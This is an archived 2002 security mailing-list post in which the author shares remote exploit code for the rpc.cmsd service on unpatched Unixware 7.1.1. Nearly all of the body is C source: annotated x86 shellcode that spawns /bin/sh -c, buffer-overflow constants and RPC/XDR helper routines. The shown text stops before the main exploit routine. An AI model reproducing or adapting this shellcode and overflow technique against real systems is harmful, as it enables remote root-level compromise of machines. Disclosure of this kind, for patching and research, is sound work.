Unixware 7.1.1 rpc.cmsd remote exploit code.

From: jGgM. (jggmat_private)
Date: Wed Jan 09 2002 - 20:40:54 PST

Next message: Dave Ahmad: "Re: Unixware 7.1.1 rpc.cmsd remote exploit code."

Previous message: Chris Nandor: "[SA-2002:00] Slashcode login vulunerability"
Next in thread: Dave Ahmad: "Re: Unixware 7.1.1 rpc.cmsd remote exploit code."
Reply: Dave Ahmad: "Re: Unixware 7.1.1 rpc.cmsd remote exploit code."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) Hi, I'm jGgM. Here is unixware 7.1.1 rpc.cmsd remote exploit code. This is old bug. ( Currently patched....maybe.. ) This works only not -patched Unixware 7.1.1. -------------------------------------- Korean security Info.. by jGgM. http://www.forsecure.com/ http://www.netemperor.com/ -------------------------------------- /* * Unixware 7.x rpc.cmsd exploit by jGgM * http://www.netemperor.com/en/ * EMail: jggmat_private */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <unistd.h> #include <rpc/rpc.h> #define CMSD_PROG 100068 #define CMSD_VERS 4 #define CMSD_PROC 21 #define BUFFER_SIZE 1036 #define SHELL_START 1024 #define RET_LENGTH 12 #define ADJUST 100 #define NOP 0x90 #define LEN 68 char shell[] = /* 0 */ "\xeb\x3d" /* jmp springboard [2000]*/ /* syscall: [2000]*/ /* 2 */ "\x9a\xff\xff\xff\xff\x07\xff" /* lcall 0x7,0x0 [2000]*/ /* 9 */ "\xc3" /* ret [2000]*/ /* start: [2000]*/ /* 10 */ "\x5e" /* popl %esi [2000]*/ /* 11 */ "\x31\xc0" /* xor %eax,%eax [2000]*/ /* 13 */ "\x89\x46\xbf" /* movl %eax,- 0x41(%esi) */ /* 16 */ "\x88\x46\xc4" /* movb %al,-0x3c (%esi) */ /* 19 */ "\x89\x46\x0c" /* movl %eax,0xc (%esi) */ /* 22 */ "\x88\x46\x17" /* movb %al,0x17 (%esi) */ /* 25 */ "\x88\x46\x1a" /* movb %al,0x1a (%esi) */ /* 28 */ "\x88\x46\xff" /* movb %al,0x?? (%esi) */ /* execve: [2000]*/ /* 31 */ "\x31\xc0" /* xor %eax,%eax [2000]*/ /* 33 */ "\x50" /* pushl %eax [2000]*/ /* 34 */ "\x56" /* pushl %esi [2000]*/ /* 35 */ "\x8d\x5e\x10" /* leal 0x10(% esi),%ebx */ /* 38 */ "\x89\x1e" /* movl %ebx,(% esi)[2000]*/ /* 40 */ "\x53" /* pushl %ebx [2000]*/ /* 41 */ "\x8d\x5e\x18" /* leal 0x18(% esi),%ebx */ /* 44 */ "\x89\x5e\x04" /* movl %ebx,0x4 (%esi) */ /* 47 */ "\x8d\x5e\x1b" /* leal 0x1b(% esi),%ebx */ /* 50 */ "\x89\x5e\x08" /* movl %ebx,0x8 (%esi) */ /* 53 */ "\xb0\x3b" /* movb $0x3b,%al [2000]*/ /* 55 */ "\xe8\xc6\xff\xff\xff" /* call syscall [2000]*/ /* 60 */ "\x83\xc4\x0c" /* addl $0xc,% esp [2000]*/ /* springboard: [2000]*/ /* 63 */ "\xe8\xc6\xff\xff\xff" /* call start [2000]*/ /* data: [2000]*/ /* 68 */ "\xff\xff\xff\xff" /* DATA [2000] */ /* 72 */ "\xff\xff\xff\xff" /* DATA [2000] */ /* 76 */ "\xff\xff\xff\xff" /* DATA [2000] */ /* 80 */ "\xff\xff\xff\xff" /* DATA [2000] */ /* 84 */ "\x2f\x62\x69\x6e\x2f\x73\x68\xff" /* DATA [2000]*/ /* 92 */ "\x2d\x63\xff"; /* DATA [2000]*/ struct cm_send { char *s1; char *s2; }; struct cm_reply { int i; }; bool_t xdr_cm_send(XDR *xdrs, struct cm_send *objp) { if(!xdr_wrapstring(xdrs, &objp->s1)) return (FALSE); if(!xdr_wrapstring(xdrs, &objp->s2)) return (FALSE); return (TRUE); } bool_t xdr_cm_reply(XDR *xdrs, struct cm_reply *objp) { if(!xdr_int(xdrs, &objp->i)) return (FALSE); return (TRUE); }

Next message: Dave Ahmad: "Re: Unixware 7.1.1 rpc.cmsd remote exploit code."
Previous message: Chris Nandor: "[SA-2002:00] Slashcode login vulunerability"
Next in thread: Dave Ahmad: "Re: Unixware 7.1.1 rpc.cmsd remote exploit code."
Reply: Dave Ahmad: "Re: Unixware 7.1.1 rpc.cmsd remote exploit code."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 12:02:56 PST